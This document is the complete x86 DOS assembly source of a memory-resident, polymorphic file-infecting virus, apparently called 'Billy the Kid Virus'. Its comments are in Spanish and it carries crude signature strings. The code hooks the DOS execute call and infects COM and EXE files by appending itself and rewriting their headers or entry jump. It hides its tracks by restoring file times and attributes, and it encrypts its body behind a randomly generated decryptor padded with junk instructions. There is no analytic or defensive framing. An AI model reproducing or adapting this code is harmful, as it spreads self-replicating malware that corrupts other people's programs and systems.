assume ss:codevir pila segment stack 'stack' db 64 dup ('12345678') pila ends code segment anfitrion: assume cs:code, ds:code mov ah, 02h mov dl, 'z' int 21h mov ax, 4C00h int 21h code ends codevir segment assume cs:codevir, ds:codevir start: mov cx, (offset fincomienzo)-(offset comienzo)+(longi)+16 mov si, offset comienzo ; Puesto por el compilador bucleen: xor byte ptr cs:[si],00h xor byte ptr cs:[si],00h inc si loop bucleen ;***comienzo*** comienzo: call acanomas acanomas label near pop ax add ax, offset fincomienzo - offset acanomas test al, 0Fh jz noinc add ax, 0010h noinc: mov cl, 04h shr ax, cl mov cx, ax push cs pop bx add bx, cx xor ax, ax push cs push bx push ax retf ; Salto a OFS0 fincomienzo: codevir ends ;***OFS0*** porfin segment assume cs:porfin, ds:porfin ; Estoy en offset 0 con el segmento anterior ; en la pila add cs:[segcsm], cx mov ah, 0DDh int 21h cmp ax, 'LO' mov cs:[segant], ds push cs ; DS = Ac� pop ds ; ES = Anterior pop es ; jnz noactivo jmp correr noactivo: push ds push es cld mov ds, [segant] push cs pop es mov cx, 0010h xor si, si mov di, offset bufpsp rep movsb pop es pop ds call activar push es mov es, [segant] mov cx, 0010h xor di, di mov si, offset bufpsp rep movsb pop es correr: cmp byte ptr [origen], 'C' jnz desdeexe desdecom: mov si, offset original ; Los 3 bytes del comienzo original mov di, 0100h cld movsw movsb mov ds, [segant] push ds mov ax, 0100h push ax retf ; Al comienzo del anfitri�n desdeexe: mov cx, [ofsexe] mov bx, cs sub bx, [segcsm] mov ax, [segstk] add ax, bx cli mov ss, ax mov sp, [ofsstk] sti mov ax, [segexe] add ax, bx mov es, [segant] mov ds, [segant] push ax push cx retf ; Al comienzo del anfitri�n activar proc cli push es mov es, [segant] mov ah, 49h int 21h mov ah, 48h mov bx, 0FFFFh int 21h sub bx, tamres+1 mov ah, 4Ah int 21h mov ax, es add ax, bx mov word ptr cs:[bufpsp + 0002h], ax mov ah, 48h mov bx, tamres int 21h mov es, ax call recubre copiamem: xor si, si mov di, si mov cx, longi cld rep movsb push es pop ds mov ax, 3521h int 21h mov [int21cs], es mov [int21ip], bx mov dx, offset handler call setintvec push cs pop ds noalcanza: pop es sti ret activar endp recubre proc push ax mov ax, es dec ax mov es, ax mov word ptr es:[0001h], 0008h mov ax, es inc ax mov es, ax pop ax ret recubre endp setintvec proc ; Entrada: ; AL : N�mero de interrupci�n ; DS:DX : Puntero al handler pushf push ax push bx push es cli xor bh, bh mov bl, al shl bx, 01h shl bx, 01h xor ax, ax mov es, ax mov es:[bx], dx mov es:[bx+02h],ds pop es pop bx pop ax popf ret setintvec endp handler proc cmp ah, 0DDh jne vamo mov ax, 'LO' iret vamo: cmp ah, 4Bh je fexec finfexec: jmp dword ptr cs:[int21ip] handler endp fexec proc cld push ax push bx push cx push dx push si push di push bp push ds push es mov ah, 48h mov bx, 0100h pushf call dword ptr cs:[int21ip] jc memoerror1 mov es, ax push es push ds push dx mov ax, 3524h pushf call dword ptr cs:[int21ip] mov cs:[int24ip], bx mov cs:[int24cs], es mov dx, offset hand24 push cs pop ds call setintvec pop dx pop ds pop es call getattr mov ax, 3D02h pushf call dword ptr cs:[int21ip] jc openerror1 push ds push dx mov bx, ax mov cs:[fhandle], ax mov ah, 3Fh mov cx, 0004h push cs pop ds mov dx, offset original ; Estos bytes ahora est�n inutilizados pushf call dword ptr cs:[int21ip] pop dx pop ds jc readerror1 push dx mov ax, 5700h pushf call dword ptr cs:[int21ip] mov cs:[fhora], cx mov cs:[ffecha],dx pop dx and cl, 00000111b cmp cl, 00000101b jz readerror1 ; 'ta listo push ds push dx xor bp, bp cmp cs:[original],'ZM' jz dale ; Dale al COM inc bp jmp dale ; Dale al EXE openerror1: ; Para permitir saltos cortos jmp openerror ; memoerror1: ; jmp memoerror ; readerror1: ; jmp readerror ; writeerror1: ; jmp writeerror ; dale: push cs pop ds mov [origen],'C' or bp, bp jnz escom1 mov [origen],'E' escom1: call alineafile ; DX:AX = Nueva longitud del archivo cmp dl, 08h ja writeerror1 ; Archivo de mas de 600k push ax push dx mov cs:[longhi], dx mov cs:[longlo], ax call crea ; DI = Longitud del bloque a meter jnc bien pop ds pop ax jmp writeerror bien: mov bx, [fhandle] push es pop ds pop dx pop ax push ax add ax, 0100h mov si, cs:[ddespl] or bp, bp jz esexe2 add [si+01h], ax esexe2: mov cx, di mov ah, 40h xor dx, dx pushf call dword ptr cs:[int21ip] pop dx jc writeerror cmp ax, cx jb writeerror push cs pop ds sub dx, 0003h mov [dsalto], dx mov ax, 4200h xor cx, cx mov dx, cx pushf call dword ptr cs:[int21ip] or bp, bp jz esexe3 mov ah, 40h mov cx, 0003h mov dx, offset cambiazo pushf call dword ptr cs:[int21ip] jc writeerror esexe3: mov dx,[ffecha] mov cx,[fhora] and cl, 11111000b or cl, 00000101b mov ax, 5701h pushf call dword ptr cs:[int21ip] writeerror: pop dx pop ds readerror: mov ah, 3Eh pushf call dword ptr cs:[int21ip] openerror: call setattr mov dx, [int24ip] mov ds, [int24cs] mov al, 24h call setintvec mov ah, 49h pushf call dword ptr cs:[int21ip] memoerror: pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax jmp finfexeC fexec endp alineafile proc xor cx, cx mov dx, cx mov ax, 4202h pushf call dword ptr cs:[int21ip] mov cx, ax neg cl and cx, 000Fh mov cs:[agregado], cx mov ah, 40h pushf call dword ptr cs:[int21ip] mov ax, 4202h xor cx, cx mov dx, cx pushf call dword ptr cs:[int21ip] ret alineafile endp getattr proc mov ax, 4300h pushf call dword ptr cs:[int21ip] mov cs:[fattr], cx mov ax, 4301h xor cx, cx pushf call dword ptr cs:[int21ip] ret getattr endp setattr proc mov ax,4301h mov cx, cs:[fattr] pushf call dword ptr cs:[int21ip] ret setattr endp hand24 proc xor al, al iret hand24 endp crea proc ; Entrada ; ES := Segmento a donde se va a crear ; DS := Segmento de c�digo ; Salida ; DI := Longitud xor di, di push bx call genpar pop bx push di mov cx, offset fincomienzor-offset comienzor mov si, offset comienzor rep movsb alinea: test di, 000Fh jz yalineado inc di jmp alinea yalineado: or bp, bp jnz escom41 push ds push es pop ds xor cx, cx mov dx, cx mov ax, 4200h pushf call dword ptr cs:[int21ip] mov ah, 3Fh mov cx, 001Ch lea dx, [di+offset finporfin] mov si, dx pushf call dword ptr cs:[int21ip] jc puchaaaa1 mov ax, cs:[longlo] ; mov dx, cs:[longhi] ; Compruebo si tiene overlays sub ax, cs:[agregado] ; sbb dx, 0000h ; mov cx, 0200h ; div cx ; or dx, dx ; jz nomas2 ; inc ax ; nomas2: ; cmp dx, [si+02h] ; jne puchaaaa1 ; cmp ax, [si+04h] ; jne puchaaaa1 ; mov ax, [si+08h] mov cs:[shead], ax mov ax, [si+0Ah] mov cs:[minimo], ax mov ax, [si+10h] mov cs:[ofsstk], ax mov ax, [si+0Eh] mov cs:[segstk], ax mov ax, [si+14h] mov cs:[ofsexe], ax mov ax, [si+16h] mov cs:[segexe], ax push bx jmp fsdf puchaaaa1: jmp puchaaaa escom41: jmp escom4 fsdf: mov ax, cs:[longlo] mov dx, cs:[longhi] push ax push dx add ax, offset finporfin adc dx, 0000h add ax, di adc dx, 0000h mov cx, 0200h div cx or dx, dx jz nomas1 inc ax nomas1: mov [si+02h], dx mov [si+04h], ax mov cs:[fsize], ax pop dx pop ax mov bx, dx mov cl, 04h shr ax, cl shr dx, cl mov cl, 0Ch and bx, 000Fh shl bx, cl or ax, bx pop bx sub ax, [si+08h] mov [si+16h], ax mov cs:[segcsm], ax dec ax mov [si+0Eh], ax lea ax, [di+offset finporfin+00FFh] mov [si+10h], ax mov word ptr [si+14h], 0000h mov ax, 4200h xor cx, cx mov dx, cx pushf call dword ptr cs:[int21ip] mov ah, 40h mov cx, 001Ch mov dx, si pushf call dword ptr cs:[int21ip] jc puchaaaa pop ds escom4: xor si, si mov cx, offset finporfin rep movsb mov ax, di pop di push ax sub ax, di mov cx, ax dec ax dec ax mov si, di mov di, [dlongit] mov es:[di+01h], ax pop di push ds push es pop ds call encript pop ds mov ax, 4202h xor cx, cx mov dx, cx pushf call dword ptr cs:[int21ip] clc ret puchaaaa: pop ds pop di stc ret crea endp ;*******************COMIENZO DE RUTINAS PMORFICAS****************** rand proc near push ds push es push bx xor ax, ax mov es, ax mov ax, cs:[segale] cmp ax, 61440 jb menor mov ax, 61339 menor: mov ds, ax mov bx, cs:[ofsale] mov ax, [bx] mov cs:[segale], ax mov bx, es:[046Ch] mov ax, [bx] add bx, ax mov cs:[ofsale], bx mov ax, [bx+10] xor ax, bx pop bx pop es pop ds ret rand endp encript proc near ;Entrada ; DS:SI := Puntero a comienzo ; CX := Longitud push si bucle: clave1 label byte db 80h, 34h, 0FFh ; xor byte ptr [si],0FFh clave2 label byte db 80h, 04h, 0FFh ; add byte ptr [si],0FFh inc si loop bucle pop si ret encript endp fillclv proc near ;ENTRADA ; DH : Clave(0=Clave1/1=Clave2) xor bh, bh call rand mov bl, al and bl, 03h ; 03h = 00000011b mov al, 80h mov ah, offset tencri[bx] or dh, dh jz sc2 mov word ptr ds:[offset clave1], ax mov ah, offset tencri[bx+4] mov word ptr ds:[offset clavd1], ax jmp short finfillclv sc2: mov word ptr ds:[offset clave2], ax mov ah, offset tencri[bx+4] mov word ptr ds:[offset clavd2], ax finfillclv: ret fillclv endp pone proc near ;Entrada ; AH := Modo (0=in�til/1=�til) push cx or ah, ah jz noutil xor dh, dh mov dl, 0Ah sub dl, cl cmp dl, 03h jz estres cmp dl, 04h jz escuatro cmp dl, 05h jz esdos cmp dl, 08h jz esocho jmp listo esdos: mov [dirbucle], di jmp listo estres: mov [dlongit], di jmp listo escuatro: mov [ddespl], di jmp listo esocho: mov [dirfbucle], di listo: mov cx, offset tablas mov bx, offset tablasi call lopone jmp short finpone noutil: push cx mov ah, 2Ah ; Get system date pushf call dword ptr cs:[int21ip] mov si, dx mov ah, 2Ch ; Get system time pushf call dword ptr cs:[int21ip] xor si, dx and si, 0001h ; 0003h= 00000000 00000001b inc si mov cx, si bucle2: push cx call rand xor dh, dh mov dl, al and dl, 07h ; 07h = 00000111b mov cx, offset tablln mov bx, offset tablano call lopone pop cx loop bucle2 pop cx finpone: pop cx ret proc lopone shl dl, 1 add dx, cx push bx mov bx, dx mov ax, [bx] pop bx mov cl, ah xor ch, ch mov si, bx xor ah, ah add si, ax cld rep movsb ret lopone endp pone endp genpar proc near ;Entrada ; ES:DI := Puntero a desencriptor a generar ; DS := Segmento de c�digo push ds push es push cs pop ds call rand mov ds:[offset clavd2+2], ah ; mov ds:[offset clave2+2], ah ; Set up claves mov ds:[offset clavd1+2], al ; mov ds:[offset clave1+2], al ; xor dh, dh call fillclv inc dh call fillclv mov cx, 000Ah pop es bucle1: xor ah, ah call pone inc ah call pone loop bucle1 push di mov di, [dirfbucle] inc di mov ax, di inc ax sub ax, [dirbucle] neg ax stosb mov di, [ddespl] pop ax mov es:[di+01h], ax mov di, ax pop ds ret genpar endp ;************************TABLA DE ENCRIPTORES****************** tencri label byte db 04h db 2Ch db 34h db 34h db 2Ch db 04h db 34h db 34h ;************************FIN TABLA ENCRIPTORES****************** ;****************************TABLA UTIL*************************** tablas db 00, 01, 01, 01, 02, 01, 03, 03, 06, 03, 09, 03, 12, 03, 15, 01 db 16, 02, 18, 01 tablasi label byte db 1Eh ; push ds db 0Eh ; push cs db 1Fh ; pop ds db 0B9h ; mov cx, Longitud a desencriptar dlongit dw ? ; db 0BEh ; mov si, Comienzo ddespl dw ? ; clavd2 db 3 DUP (?) clavd1 db 3 DUP (?) db 46h ; inc si db 0E2h ; loop bucle salto db ? db 1Fh ; pop ds ;******************************FIN TABLA UTIL************************ ;****************************TABLA INUTIL*************************** tablln DB 00, 01, 01, 03, 04, 03, 07, 01, 08, 01, 09, 04, 13, 05, 18, 01 tablano label byte db 90h db 25h, 0FFh, 0FFh db 0Dh, 00h, 00h db 0F8h db 0F9h db 81h, 0C9h, 00h, 00h db 80h, 06h, 34h, 12h, 00h db 0FCh ;***********************FIN TABLA INUTIL************************** ;****************************VARIABLES*************************** dirbucle dw ? dirfbucle dw ? segale dw ? ofsale dw ? ;*****************************FIN DE RUTINAS PMORFICAS**************** ;Repetici�n, pero en el otro segmento para que quede residente comienzor: call acanomasr acanomasr label near pop ax add ax, offset fincomienzor - offset acanomasr test al, 0Fh jz noincr add ax, 0010h noincr: mov cl, 04h shr ax, cl mov cx, ax push cs pop bx add bx, ax xor ax, ax push cs push bx push ax retf ; Salto a OFS0 fincomienzor: ;*****************************VARIABLES******************************* longi = offset finporfin tamres = 0100h segant dw ? origen db 'E' bufpsp db 10h dup(?) original label word segexe dw 32 ofsexe dw 0 segcsm dw 33 segstk dw 0 ofsstk dw 0200h fsize dw 3 shead dw 32 minimo dw 1 fhandle dw ? fhora dw ? ffecha dw ? fattr dw ? tapon db 'COMMAND' cambiazo db 0E9h dsalto DW ? longlo dw ? longhi dw ? int21ip dw ? int21cs dw ? int24ip dw ? int24cs dw ? agregado dw ? ; db ' (C)1994 S.A.O. Texas. Billy the Kid Virus.' ; db ' Look out boy! This is the only far west virus that will make' ; db ' you cry for being born.' ; db ' P.S. : Listen Led Zeppelin and AC/DC with your sons and God' ; db ' will bless ya. ' ; db ' Leave Castro alone.' ; db ' Superman... Why don't you fuck Luisa????' ; db " That's not a fuckin grafitti, it's a sign." ; db 'Jeroboam y todo el pueblo volvieron a ver a Rehoboam al tercer ' ; db 'dia como lo ordeno el rey.' ; db 'I hate moscas.' ; db 'Hecho en piensen que se hizo aca en Argentina.' finporfin label byte porfin ends end start